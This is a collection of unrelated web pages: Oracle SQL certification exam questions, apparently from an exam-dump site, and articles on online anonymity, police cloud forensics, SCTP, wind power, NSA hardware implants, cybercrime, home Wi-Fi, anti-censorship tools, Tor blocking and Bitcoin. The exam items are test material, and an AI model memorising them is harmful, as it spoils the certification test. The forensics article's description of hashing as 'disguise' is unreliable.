Car 54, we found you. | <urn:uuid:8f155216-61eb-4dcb-acca-649ba821b1a9> | CC-MAIN-2017-09 | http://www.govtech.com/magazines/gt/Car-54-Where-Are-You.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171775.73/warc/CC-MAIN-20170219104611-00304-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.962411 | 1,214 | 2.625 | 3 |
Evaluate the SQL statement: TRUNCATE TABLE DEPT; Which three are true about theSQL statement? (Choose three.)
You need to design a student registration database that contains several tables storingacademic information. The STUDENTS table stores information about a student. TheSTUDENT_GRADES table stores information about the student’s grades. Both of the tableshave a column named STUDENT_ID. The […]
Here is the structure and data of the CUST_TRANS table: Exhibit: Dates are stored in thedefault date format dd-mm-rr in the CUST_TRANS table. Which three SQL statementswould execute successfully? (Choose three.)
See the Exhibit and examine the structure and data in the INVOICE table: Exhibit: Whichtwo SQL statements would executes successfully? (Choose two.)
Which three statements are true regarding sub queries? (Choose three.)
See the Exhibit and examine the structure of the CUSTOMERS table: Using theCUSTOMERS table, you need to generate a report that shown the average credit limit forcustomers in WASHINGTON and NEW YORK. Which SQL statement would produce therequired result?
Evaluate these two SQL statements: SELECT last_name, salary, hire_date FROMEMPLOYEES ORDER BY salary DESC; SELECT last_name, salary, hire_date FROMEMPLOYEES ORDER BY 2 DESC; What is true about them?
Where can sub queries be used? (Choose all that apply)
Which three SQL statements would display the value 1890.55 as $1,890.55? (Choosethree.)
Evaluate the following SQL statement: Which statement is true regarding the outcome of theabove query? | <urn:uuid:400d75fd-be78-4ef3-928d-e0f83b7b11ef> | CC-MAIN-2017-09 | http://www.aiotestking.com/oracle/category/exam-1z0-051-oracle-database-11g-sql-fundamentals-i-updated-april-20th-2016/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00480-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.837901 | 364 | 3.328125 | 3 |
Dr Louise Bennett explains the difference between security, secrecy, privacy and anonymity online.
At a roundtable hosted by Silent Circle, Dr Louise Bennett, chair of the Security Community of Expertise, talked about the issues in differentiating security, secrecy, privacy and anonymity online.
"The real balancing act between security and privacy is between notifications and the right to privacy," says Dr Bennett. "This is what people get upset about in companies like Google with the commercialisation of the internet and government surveillance. It’s because these things have been linked together without the permission of the individual or they cross things that I don’t give my consent to share with anybody else.
"We all know that there are a lot of different commercial models on the internet. Some services are free or below cost because of the value of data that you as a customer give up when you use the site. And the quid-pro-quo is usually targeted advertising. Young kids I talk to say, ‘Facebook is free, and that’s wonderful.’ But Facebook is not free, get real! You’re putting all this personal data out there and often they don’t know the privacy settings so this can be seen by anybody and this is then used to target you.
"The key thing is how do you keep control of your data and personal information? Well statistics will tell you, you can’t on the internet. Once it’s out there, it’s out there. If someone is determined to find your data, you’ve got a problem.
She stresses: "We have to understand that identity on the internet can be used as currency and can be gathered through Big Data aggregation and Big Data analytics and you have to decide to what extent you are prepared to use your identity attributes as payments for services you want. But you have to be aware of it and make your own choice."
She also highlights the second balancing act, which puts security and secrecy on one side and privacy and anonymity on the other. "I think there are really significant differences between privacy and anonymity. I would say that on the internet, anonymity is the ability to perform actions without them being traced to a person; they can trace them to the thing, but not the person."
Dr Bennett draws out the pros and cons of anonymity by stating that it can ensure individuals have the right to free speech without fearing the repercussions. But also, people can’t be easily identified and held to account if they are anonymous.
Alternatively, she describes secrecy as what is known but not to everybody. Secrecy is what the intelligence services strive for. On the other hand, privacy is the ability to provide information to those who only we want provides the information to under our own free will.
"Privacy protects people and doesn’t per say damage national security or law enforcement. But some would say it does. It does make those things harder to achieve. But I would say anonymity does cause damage," she says.
"Some of the only people who have really chosen to be anonymous are the people in Anonymous and LulzSec. They know the persona and the avatar, but they didn’t know the biological person before they got together. Anonymity isn’t necessarily for privacy but it is often misinterpreted as being synonymous with privacy. Activists in the Arab Spring say they wanted anonymity, but they didn’t because if they had anonymity they wouldn’t have been known to their friends and could have been compromised by the state. What they wanted was privacy from the state. That is not the same thing.
"I think privacy overlaps security; they go hand-in-hand and what advocates for privacy really want is security for the individual from the intrusion into their personal life or targeted action. You have two groups of people: advocates of strong unique electronic identities for national security purposes will often come from countries like China and countries with oppressive regimes," explains Dr Bennett.
On the side of those who are anti-anonymity, there are arguments that with the shield of anonymity, individuals can stalk, masquerade as others, they can be liable and will get into organisations to steal and defraud. Anonymous terrorists can plan, radicalise and perform cyber attacks and activists can compromise businesses and publish confidential information. Anonymity essentially removes accountability and makes the job of law enforcement much harder in the virtual world than it is in the physical world.
For those who are pro-anonymity and oppose electronic identities argue that there are those who use anonymity with good intent: whistleblowers who unveil wrongdoings of powerful individuals or organisations. Individuals can partition their lives or limit damage caused by people stealing their identities. They’ll say that individuals with anonymity can avoid discrimination, escape abusive relationships and regimes and start a new life. Activists with a vested interest can give a voice to the silent majority. Anonymity protects the weak individual from abuse by the powerful.
"Most people are probably on both sides of the argument: it isn’t as simple as that," says Dr Bennett.
"There is an enormous amount of work being done across the world, security, privacy and anonymity: how they work against each other and how they overlap. There is never going to global agreement over the rationality of these different things, what we have to work towards is global understanding of people’s perspectives and an understanding of the context."
She concludes: "There are those who are against anonymity because it prevents accountability of those with malicious intent and there are those who are for anonymity because there are those with good intent who are abused by others. There isn’t a single answer, you have to choose but you have to be aware of others opinions." | <urn:uuid:252c0db3-3480-44e3-81c1-8a14ca0e1e84> | CC-MAIN-2017-09 | http://www.cbronline.com/news/do-you-want-to-be-private-or-anonymous-on-the-net | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00476-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.967848 | 1,182 | 2.84375 | 3 |
With there now being more mobile phones on the planet than people and smartphones set to achieve saturation in just 10 years, unlocking the data held on them has increasingly needed to be used as vital evidence for police forces.
However as apps – and the data held within them – have moved into the cloud, police forces have struggled to follow this data into the ether. Law enforcement agencies could in fact be missing out on critical evidence if they don’t have technology in place to extract and analyse this evidence.
What makes it so valuable is that an increasingly large proportion of information now accessed on a modern device – whether that be via Gmail, Dropbox or WhatsApp – is actually stored in the cloud, not on the device itself.
Therefore, it is not data that can be easily accessible from traditional mobile or PC extraction techniques. Yet, this data is rich in potential case-solving content for police officers.
For example, there are applications that are designed to provide a more accurate search experience for the user, which in turn provides a minute by minute accurate log of where they were at any given moment. Thus being important evidence to either place a suspect at the scene of a crime or to corroborate an alibi.
The issue is that, historically, there has been no streamlined or standard method for gaining access to cloud-based data as there are a number of challenges to extracting it. One of the main issues has been the paradigm shift in a consumer’s view of their own security and privacy in the wake of numerous scaremongering media stories.
This has led to consumers not allowing global access to their data, but making their social media content and information 'private' so that it is restricted to only friends and family being able to view it.
This has made it more difficult and time consuming for law enforcement agencies to extract the required data without the subject revealing their credentials and the fear that the data may not be forensically preserved.
The Goldilocks effect
Identifying evidence in the cloud is a particular challenge because of the sheer amount of data now housed in the cloud, with current estimates suggesting that at least 2.5 quintillion bytes of data is added every day. Too much, and a search might be overbroad; too little, and investigators could miss important data for their case.
There are a number of challenges law enforcement agencies experience when relying on service providers to extract and provide them with the desired data. Firstly there is the costly legal procedures associated in filing a MLAT (mutual legal assistance treaty) request as the data often resides cross-border.
Secondly is the fact that a provider’s response will often be far from swift and more likely measured in weeks or months. Finally, there is the difficulty of a silo-ed analysis of a likely incomplete data set from multiple providers.
For investigators, this collection and analysis of data from distributed and disparate sources is challenging but an unavoidable truth as perpetrators will likely use multiple services from different providers.
Yet, they need to persevere as data from multiple social media, file sharing, or location-based data accounts (or mobile device) will enable them to contextualise a suspect’s or victim’s activities, whilst showing an investigator’s due diligence in building a case.
Extinguishing the burner phone
By investigators being able to effectively infiltrate the cloud, it reduces the risk of missing content, its context and meaning. By viewing and capturing data in context, and placing it alongside other data available from a suspect’s mobile device or operator’s call detail records, gives investigators further insight into how evidence correlates and can build up a solid case.
Even in cases where a wily suspect has used a so called ‘burner phone’ to conceal their identity, commonalities will likely exist between devices and cloud accounts. Therefore, investigators will still be able to tie devices and accounts to a suspect.
Be mindful of legal obligations
It is important for police forces to be mindful of legal obligation in regard to data privacy. To ensure this, an investigation will begin with extracting user data, including credentials and cloud access keys, found on a subject mobile device with the proper legal authority.
This account-based approach means that they will only selectively acquire data residing in the cloud that is associated with a specific user, unless the account is shared.
By doing so preserves the privacy of other tenants collocated on the same cloud server and minimises issues with evidence being scattered around different storage locations.
Specific cloud analysers designed for police forces promote forensic best practices around validation and authentication by relying on provider APIs to perform extractions. They will then hash (disguise) each individual artefact and, separately, the associated metadata. Not only does this ensure repeatability; it also allows for proper validation using records obtained directly from the service provider. This in turn helps speed the access to evidence and makes them instantly actionable for the investigation.
Prepare for the future
Most legacy digital forensic training materials are outdated as they were authored before the emergence of cloud-based environments. Therefore, investigators need training not just on cloud forensics policy and procedure, but also the foundation of cloud computing technology itself.
Otherwise, the lack of knowledge about cloud technology may interfere with remote investigations where systems are not physically accessible and there is an absence of proper tools to effectively investigate the cloud computing environment.
. Together with mobile device data, they can capture the details and critical connections investigators need to solve crimes.
By peering through the cloud to correlate evidence from multiple cloud-based accounts and disparate data formats, police forces can reduce the risk of missing valuable evidence for their investigations.
Sourced from Shahaf Rozanski, director of forensic products, Cellebrite | <urn:uuid:8a388b1b-63f7-42db-8e56-ffe9e6592c9b> | CC-MAIN-2017-09 | http://www.information-age.com/peering-through-cloud-how-cloud-data-can-be-vital-component-law-enforcement-123461065/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00476-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.944902 | 1,173 | 2.53125 | 3 |
Stream Control Transmission Protocol (SCTP) is a Transport Layer computer networking protocol, used to transmit multiple streams of data at the same time between two end points with a network connection. It ensures reliable, in-sequence transport of messages with congestion control, similar to Transmission Control Protocol (TCP) and User Datagram Protocol (UDP).
In contrast to TCP, SCTP ensures the complete concurrent transmission of several streams of data in “messages” between connected end points. This means that if data is lost in one stream, delivery will not be affected for the other streams. SCTP assigns a sequence number to each message sent in a stream to preserve byte order in the stream, allowing independent ordering of messages in different streams and processing messages in the order received instead of the order sent.
SCTP also supports multihoming, so a connected end point can have alternate IP addresses to route around network failure or changing conditions. Sometimes referred to as "next generation TCP," SCTP supports Signaling System 7 (SS7) telephone connection over the Internet and enables management of connections over a wireless network and transmission of multimedia data.
SCTP was defined by the Internet Engineering Task Force (IETF) Signaling Transport (Sigtran) working group in 2000, including Cisco’s Randall Stewart and Peter Lei. They collaborated with colleagues from Aciri, Ericsson, Nortel Networks, Siemens, Telecordia, and UCLA. SCTP is maintained by Stewart and the IETF Transport Area (TSVWG) working group, including Lei and Michael Tuexen. Additional maintainers focus on the Mac Operating System and v6 mobility.
SCTP has been implemented for a number of operating systems including: | <urn:uuid:665970a5-832c-47b8-81ef-8e72b7bfd4b2> | CC-MAIN-2017-09 | http://www.cisco.com/c/en/us/about/open-source/open-standards/sigtran.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00296-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.907694 | 359 | 3.515625 | 4 |
That breeze you feel? It's more than just a pleasant sensation on your face.
We don't often think of it, but the wind represents the heating and cooling cycle of 5.5 quadrillion tons of air by a medium-sized star about eight light-minutes away. Heated air rises, and cooler air meanders, rushes, or otherwise moves in to fill the void.
While our atmosphere is fluid and dynamic, the shape of the land and the water over which the air moves is decidedly less so, which eventually creates patterns of wind and weather that can be predictable ... if you have enough data.
Knowing the wind patterns is more than being thorough about the weather. It's also critical to optimizing wind energy production, which is growing in global capacity by double-digit percentages each year.
According to the World Wind Energy Association, by the end of 2010, the power of the wind provided 430 terawatt-hours of electricity to the nations of the world, more than enough to completely power the United Kingdom, the sixth largest economy in the world.
While that sounds like a lot of power, it should be noted that, according to the same report, this also represents just 2.5 percent of global electricity demand. But statistics from The Wind Power Database show that the global capacity it tracks has grown an average of 29.2 percent annually since 1995. In five years, that could put wind power capacity at 1,548 terawatt-hours, or nine percent of current global demand.
Projections aside, there's a lot of energy to be had right now in wind energy, but like anything that depends on nature as a resource, there's also a lot of risk.
Hitting the target
If you look at the US Department of Energy's wind resources map, even the most casual observer can see that some areas of the country are better suited for wind energy production than others.
And to a large degree, many onshore wind farms are indeed located in the areas of larger wind potential. If you travel to western Indiana, you should expect to find a number of wind farms, and sure enough, there are many wind turbines dotting the flat western Indiana farmland.
But getting wind turbines to be hyper-efficient means more than just plunking a few down in a generally windy area, and raking in the power and the money. Companies, investors, and power consumers must know what to expect to the highest degree of certainty. Having a turbine under-perform can drastically reduce the return on investment in these multi-million dollar machines. The opposite is true, as well. Put a wind turbine in a windier area for which it was designed, and you will damage a turbine faster, sometimes catastrophically.
This is the challenge that faces the Danish turbine manufacturer Vestas Wind Systems A/S. The company has made and installed more than 43,000 land-based wind turbines in 66 nations since its inception in 1979. Vestas turbines are responsible for generating 90 terawatt-hours -- just over 20 percent -- of the world's wind power alone.
To help them achieve optimal wind turbine placement and better operational control and forecasting of the turbines once they are installed, Vestas has relied on its own wind library, which includes data from 35,000 global weather stations, as well as data that's incoming from its own turbines. | <urn:uuid:c356aa6f-e0dc-4fe1-8587-2abd273e2938> | CC-MAIN-2017-09 | http://www.itworld.com/article/2721868/big-data/turbine-company-knows-which-way-the-wind-blows-at-your-house.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171834.68/warc/CC-MAIN-20170219104611-00348-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.957529 | 690 | 2.921875 | 3 |
Reports this week that the National Security Agency uses radio signals to collect data from tens of thousands of non-U.S. computers, some not connected to the Internet, is sure to fuel more acrimony towards the U.S. spy agency.
But observers note that the NSA is not the first of the world's spy agencies to use such technology to surreptitiously gather classified information from other countries.
For instance, intelligence personnel in the former Soviet Union used similar tactics to secretly gather information from electric typewriters at U.S. government offices in Moscow and Leningrad more than 30 years ago. And experts say it's a near certainty that the spy agencies of other advanced nations are doing the same thing today.
"Physical compromise of a target's technology is what we expect intelligence agencies to do," said John Pescatore, director of emerging technology at the SANS Institute and a former NSA security engineer.
"The Chinese have been doing it to the laptops and smartphones of foreign executives visiting China. Years ago the French did similar things in their country and I'm sure British intelligence has done the same thing," Pescatore said. "What the NSA is doing now is what all superpower intelligence agencies have done, are doing, and will do."
The New York Times reported Tuesday that documents leaked last year by former NSA contractor Edward Snowden disclosed that the NSA has embedded software and hardware "bugs" in some 100,000 targeted systems around the world. The "bugs" allow the NSA to collect information from the systems even when they are not connected to the Internet.
The technology, which has to be physically installed in most cases, has been available since at least 2008. It "relies on a covert channel of radio waves that can be transmitted from tiny circuit boards and USB cards inserted surreptitiously into the computers," according to the Times report. Data captured by the devices are sent to small briefcase-sized relay stations often set up miles away from the target system.
The software has apparently allowed the NSA to do an end-run around whatever cybersecurity controls are installed on the compromised systems.
The spy technology is said to be part of an intelligence operation, code-named Quantum, that mostly targets units of the Chinese Army, Russian military networks and systems used by drug cartels and police in Mexico. The program also targets European Union trade institutions, and government agencies in India, Pakistan and Saudi Arabia.
"They [bugs] are very impressive," said noted security researcher and cryptographer Bruce Schneier, CTO at Co3 Systems. "These hardware implants show that the NSA has been continuing its research and development since the Cold War, which is what we should expect."
However, experts do note that the collection of information via radio frequency is not new.
In the mid-1980s, Soviet secret police planted electromechanical bugs in numerous electric typewriters at the U.S. embassy in Moscow and its consular office in Leningrad. Like the NSA implants described in the Times story, the Soviet bugs transmitted data using radio waves.
Declassified NSA documents describe how the bugged typewriters allowed the Soviets to access copies of routine memos and classified documents, oftentimes before U.S officials read them.
Between 1976 and 1984, the Soviets installed the bugs on 16 IBM Selectric typewriters. The bugs operated at 30, 60 or 90 Mhz range via radio frequency and were concealed in a metal bar, called the comb supporter, in the typewriters.
The Soviets upgraded the implants several times and eventually completed work on five generations, three that operated on DC power and two on AC power. The bugs could be installed in 30 minutes or less, could be switched on and off remotely and contained integrated circuits that were very advanced for the times, according to the NSA documents. Some had beacons that indicated when the electric typewriters were turned on or off.
The implants were designed to pick up the magnetic energy generated when a typewriter key was struck, convert it into digital electrical signals and transmit it via radio frequency to a nearby Soviet listening post. According to the NSA post-mortem, the bug marked the first time that data was captured in this fashion from a device that held plaintext information.
The discovery of the implants triggered an NSA response, codenamed GUNMAN, that eventually led to the replacement of more than 11 tons of equipment in the offices targeted by the Soviets. It also prompted sweeping changes in U.S. State Department security practices and an overhaul of the U.S. technology and techniques used to detect and respond to electronic threats.
"This was in the 1980s when electric typewriters were the PCs of the day," Pescatore said. "The NSA was also doing the same thing to the Soviets back then -- the Soviets were just better at the time."
Schneier added and the NSA "might have a larger budget than anyone else in the world, but they're not made of magic. These are the sorts of techniques that any well funded national intelligence agency would employ and -- as they get cheaper -- criminals will employ."
Jaikumar Vijayan covers data security and privacy issues, financial services security and e-voting for Computerworld. Follow Jaikumar on Twitter at @jaivijayan, or subscribe to Jaikumar's RSS feed . His email address is email@example.com.
Read more about cyberwarfare in Computerworld's Cyberwarfare Topic Center. | <urn:uuid:cefcbe81-9edc-4b8b-86fc-f7ee71db602c> | CC-MAIN-2017-09 | http://www.computerworld.com.au/article/535996/spy_agencies_around_world_use_radio_signals_tap_data_from_targeted_systems/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170696.61/warc/CC-MAIN-20170219104610-00644-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.962173 | 1,128 | 2.640625 | 3 |
Discover the ways in which cybercrime occurs in three realms: individual, business, and governmental. Learn what you can do to protect yourself and your organization.
During the 1920s and 1930s in the United States, there was a rather famous bank robber named Willie Sutton. He was called "The Gentleman Bank Robber" because of his demeanor and natty dress style. Ultimately, he was arrested. Recycling an anecdote from an earlier blog, the authorities reportedly asked him why he robbed banks. As the legend goes, he responded, "Because that's where the money is." As far back as 2009, an episode of "60 Minutes" on cybercrime and cyberwarfare interviewed Shawn Henry of the FBI. Now at CrowdStrike, Mr. Henry talked about a coordinated raid on the banking system in 29 countries through simultaneous withdrawals at ATM kiosks. This crime, which cost ten million dollars, was performed using stolen credit card numbers. To paraphrase Mr. Henry it would be "front-page news" if that was carried out with guns blazing. Hackers, then, are committing cybercrime across the Internet with techniques ranging from identity theft to stealing credit cards to stealing intellectual property in order to profit from their crimes, commit espionage, or for geopolitical and social causes.
Considering the credit card black market and the theft of information from major retailers, hotel chains, and restaurants, the value of the cybercrime grows dramatically.
For the victims-individual or corporate-the consequences are personal. When a criminal accesses someone's personally identifiable information (PII), financial information, identity, or personal health information (PHI) and uses it to carry out fraud, the effects have been likened to the sense of violation and mourning that matches being told they have a serious health problem. After a breach, businesses need to expend resources to close the vulnerabilities that the criminals exploited and (perhaps) compensate customers financially or with services such as Identity Theft Protection. They also suffer the intangible costs (we call this qualitative risk) of loss of customer trust and loyalty. Even if a company isn't charging for services (such as an information website,) the lingering "bad taste" of the cyber-attack stays with the consumers.
Victims of Cybercrime
Broadly, as in life, we can look at the victims of cybercrime in three realms: individual, business, and governmental.
Carried out against individuals, the purpose of the attack may be to gather PHI or financial information to carry out an electronic robbery. Alternately, it may be to commandeer the victim's system into a so-called Botnet and then use the victim computer for sending SPAM or for a Denial-of-Service (DoS) attack. Here, as well, the bad actors may be cyber-gangs, individuals, or nation-states.
Cybercrime against consumers takes on two forms, but the results are generally the same. An individual may have their financial information misused or their "identity" stolen. For example, criminals have stolen my credit card number to rent hotel rooms in Accra (the capital of Ghana) and someone once tried to bail a friend out of jail with my information. Obviously, the latter did not work out well for any of the criminals, either in custody or soon-to-be. A much tougher problem for individuals occurs when "identity theft" takes place and the criminals use someone else's PII to obtain a loan or perform some other action that appears on the victim's credit report.
Individuals can also be victims of personally directed cybercrime. Stories of cyber-stalking, cyber-bullying, and online harassment regularly appear in newspapers and on news websites. With the growth in use of social media, this has taken on a new importance.
Businesses must be concerned about the theft of their customers' information, whether that is account information, residential and email address, or payment data such as credit card information. Hacks that disclose PII and financial information have been in the news continually (it seems) since December 2013. Facing customers and the Internet, website defacement can prove an embarrassment (at the least) to a company, as can having their Internet presences brought down by DoS attacks. Responses to these attacks cost money and resources to fix. They also engender lack of trust amongst their customers. | <urn:uuid:43384854-21c6-4f96-82ac-b5f6ca6cc6d6> | CC-MAIN-2017-09 | https://www.globalknowledge.com/ca-en/resources/resource-library/white-paper/cybercrime-101/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00040-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.951868 | 887 | 3.328125 | 3 |
Fact: We need fast, reliable Internet. And increasingly, we need it everywhere.
Nearly three-quarters of us believe that having high-speed Internet in every room of the house is either vitally important or very important. That’s according to our latest Consumer Entertainment Index study.
High-speed Internet is so important because it is related to almost everything we do, from video chatting with our family and friends to streaming movies on Netflix® and gaming over the Playstation® and Xbox One networks. A lot of things run expressly on the Internet, and the Internet, in turn, relies on the devices that deliver it throughout our homes.
Today we’re going to talk about the four most important ones: modems, Wi-Fi® routers, broadband gateways, and extenders.
The first piece of the puzzle is your modem: it brings the Internet into your home. Because it’s your home’s primary connection to the Internet, it’s arguably the most important device.
Of course, we all just want Wi-Fi without limits, and for that, you need a Wi-Fi router. It takes the Internet from your modem and creates a wireless signal that you can access throughout your home. But keep in mind that the strength of that wireless signal changes based on things inside your home, like the type of walls or floors it has to go through or how far away it is from the devices that it’s communicating with (i.e. tablets, cellphones)
A gateway is a device that combines the modem and Wi-Fi router into a single device. It brings the Internet signal into your home and also transmits it wirelessly.
So now we have our modem, router and gateway—but what happens when there’s a room in your home where the Wi-Fi is very weak or non-existent? There are many ways to improve the range of the Internet in your home, but one of the simplest and most cost-efficient is using a Wi-Fi network extender or repeater. It receives the wireless signal from your router or gateway and boosts it a further distance than the router may be capable of broadcasting on its own—like a megaphone does with your voice. But keep in mind that each wireless repeater cuts your bandwidth in half. So while it allows you to cover more ground, you’ll also lose some effective speed.
Now that we’ve talked about how these networking pieces work together, how do you know which one to buy? Check out our SURFboard web site for more information. | <urn:uuid:32a268e6-5d08-4555-b25a-397d5d951e8c> | CC-MAIN-2017-09 | http://www.arriseverywhere.com/tag/internet/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00216-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.935367 | 533 | 2.515625 | 3 |
Google Ideas announces tools to combat online censorship #FreedomOfSpeech
Access to the internet and the ease of communication it affords us is something we now take for granted. In a sense this is how it should be -- access to the internet really should be seen as a right. But in all too many countries around the world, citizens find that government and dictatorships block or restrict access to the internet, or close down sites that speak out against regimes. This is something Google is keen to be involved in stopping, and this week launched a series of tools to help in the fight.
It's an idea which echoes of the Alliance for Affordable Internet campaign to make internet access cheaper, and Internet.org's dream of connecting the world, but there is a rather more political edge to it.
Google Ideas -- described as the company's "think/do tank" -- is partnering up with Council on Foreign Relations and the Gen Next Foundation to host a summit at which the problem of tackling restrictive online censorship will be addressed. At the same time, three tools will be released that help to promote the idea of online freedom of speech.
Director of Google Ideas, Jared Cohen, says:
"Information technologies have transformed conflict in our connected world, and access to the free flow of information is increasingly critical. This week’s summit -- as well as [the tools] -- are all steps we-re taking to help those fighting for free expression around the globe."
Project Shield can be used by organizations disseminating information about elections, human rights and news to use Google technology to help avoid DDoS attacks. Digital Attack Map is a fascinating tool that display realtime information about DDoS attacks as they take place around the world. Rounding off the trio of tools is uProxy, a browser extension that helps to secure sensitive data against detection and censorship.
Find out more at the Google Ideas blog where there's also an introductory video. | <urn:uuid:cd6db530-3023-4b57-ba77-97eaf02128a2> | CC-MAIN-2017-09 | https://betanews.com/2013/10/21/google-ideas-announces-tools-to-combat-online-censorship-freedomofspeech/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00216-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.934663 | 391 | 2.625 | 3 |
Back in the 1970s, Kotaku Wamura, then-mayor of Fudai, Japan, built a huge floodgate between his town and the sea as protection from tsunamis. He had a difficult time of it -- it was ugly, and it cost more than $30 million in today's dollars. But in March 2011, the floodgate saved Fudai from the tsunami that hit and destroyed many other coastal Japanese cities. Wamura died in 1997, and while he never saw the results of his work, people visited his grave to give thanks.
The question of how to protect people and infrastructure from catastrophic floods, storms and hurricanes has become much more difficult in the wake of so-called "100-year events" that seem to occur much more frequently lately, with sometimes horrific consequences. In 2005, for example, Hurricane Katrina cost $100 billion in damages and nearly 2,000 lives. Then Superstorm Sandy caused an estimated $65 billion in damages in 2012, along with the loss of nearly 300 lives in seven countries. While no one reasonably expects to be 100 percent safe from events like these, what can be done to mitigate deaths and damage, and how much protection can be achieved per dollar of infrastructure investment?
Last year President Obama released an Action Plan for Climate Change, which directed agencies to support "climate-resilient" investment in transportation, water management and disaster relief. So what does disaster resilient mean?
"Building disaster resilience," according to the U.K. Department for International Development, "is the term we use to describe the process of helping communities and countries to be better prepared to withstand and rapidly recover from a shock such as an earthquake, drought, flood or cyclone."
According to Obama's action plan, the National Institute of Standards and Technology will begin developing disaster resilience standards, frameworks and guidelines. In addition, the president's 2014 budget proposed $200 million to help communities enhance preparedness and planning. In addition, E&E News reports that the U.S. Department of Transportation announced a $3 billion fund last year for public transit systems. The effort includes things like elevating subway ventilation grates to prevent floodwaters from rushing in.
Between this kind of low-hanging fruit on one end of the spectrum and the "move everyone away from the sea and build concrete bunkers to live in" on the other, is a vast middle ground of actions that can help. Better flood maps, coastal zoning, construction standards and more will be evaluated by the amount of protection afforded and the costs involved.
While Wamura's floodgate is not practical for many locations, selecting and upgrading infrastructure around disaster resilience could spell the difference between destruction and survival. | <urn:uuid:c49c7f63-9f86-4b06-9246-95e059b0450d> | CC-MAIN-2017-09 | http://www.govtech.com/public-safety/House-of-Brick-Disaster-Resilience.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172649.58/warc/CC-MAIN-20170219104612-00568-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.963091 | 549 | 3.046875 | 3 |
The Internet is becoming harder to browse for users of Tor, the anonymity network that provides greater privacy, according to a new study.
The blame can be placed largely on those who use Tor, short for The Onion Router, for spamming or cyberattacks. But the fallout means that those who want to benefit from the system's privacy protections are sometimes locked out.
Researchers scanned the entire IPv4 address space and found that 1.3 million websites will not allow a connection coming from a known Tor exit node. Also, some 3.67 percent of Alexa's top 1000 websites will block Tor users at the application level.
It results in Tor users "effectively being relegated to the role of second-class citizens on the Internet," they wrote.
"Anonymous communication on the Internet is a critical resource for people whose access to the Internet is restricted by governments," the paper reads. "However, the utility of anonymity networks is threatened by services on the Internet that block or degrade requests from anonymous users."
Tor is a network of distributed nodes that provide greater privacy by encrypting a person’s browsing traffic and routing that traffic through random proxy servers. The project was started by the U.S. Naval Research Laboratory although it is now maintained by the nonprofit Tor Project.
Using Tor requires downloading a specialized version of the Firefox browser. When a person visits a website, the website only sees the IP address of the so-called Tor "exit node" server, which could be anywhere in the world.
The problem is that while Tor is used by people looking to safeguard their privacy, it's also used by cyberattackers to mask their activities.
Because of that, some companies that provide specialized and attack-resistant content delivery systems have either blocked or made it difficult for those using Tor to access services, the researchers wrote.
CloudFlare, a large content delivery service, does not explicitly block Tor users, but it does assign a reputation score to Tor exit nodes. If an IP address has a poor reputation, visitors that have come through via that flagged exit node might see a CAPTCHA, the jumbled text that users have to solve before proceeding.
The Tor Project has a list of commonly seen blocking messages, including one from Akamai, another large content delivery service. Craigslist and Yelp also appear to have their own custom detection algorithms to limit Tor users.
Google and Yahoo do not block Tor for search, but the researchers noticed that some pages and functions within those sites were blocked.
"While many websites block Tor to reduce abuse, doing so inadvertently impacts users from censored countries who do not have other ways to access censored Internet content," they wrote.
The paper was authored by Sheharbano Khattak, David Fifield, Sadia Afroz, Mobin Javed, Srikanth Sundaresan, Vern Paxson, Steven J. Murdoch and Damon McCoy. | <urn:uuid:0832e182-c36f-46db-a170-4661b5958dd9> | CC-MAIN-2017-09 | http://www.itnews.com/article/3037178/tor-users-increasingly-treated-like-second-class-web-citizens.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00512-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.953275 | 589 | 2.671875 | 3 |
Bitcoin is a new online digital currency which has been in the news recently because of its dramatic price fluctuations. The currency uses peer-to-peer networking for transfers, whereas digital certificates, cryptographics, and decentralised processing provide security. It has been referred to as MOIP – Money Over Internet Protocol.
Bitcoin is a global currency – anyone in the world can open a Bitcoin account, and accept payment for goods and services, or donations, into the account. Bitcoins can also be purchased in the local currency through an exchange. Bitcoins can be transferred directly to anyone who has an account (a Bitcoin address). Transaction costs are low and Bitcoin transactions are irreversible.
Mt Gox is the largest Bitcoin exchange. Bitcoin market prices in the second half of 2012 fluctuated between $6-$12 USD. Prices peaked at $266 on April 10, 2013, and have been hovering above $100 per Bitcoin since then.
The early adopters of Bitcoins were WordPress, Wikileaks, Reddit, and some non-profit organisations who accept donations. The currency is slowly gaining traction amongst companies and BitPay have so far registered about 7,500 retailers. BitPay makes it easier for retailers to accept Bitcoin as payment for goods and services, and to convert Bitcoins into the local currency.
By limiting the supply to 21 million Bitcoins, it is hoped that scarcity will be maintained, which is essential for the value of the currency. If demand grows from more and more people wanting Bitcoins, a limited supply will push the price up. So far, about 10 million Bitcoins have been released into circulation. A mechanism called mining is used to add new Bitcoins into the system at a rate of about 300 per hour. Portions of Bitcoins can be used in transactions, such as a hundredth, thousandth, or millionth, of a Bitcoin.
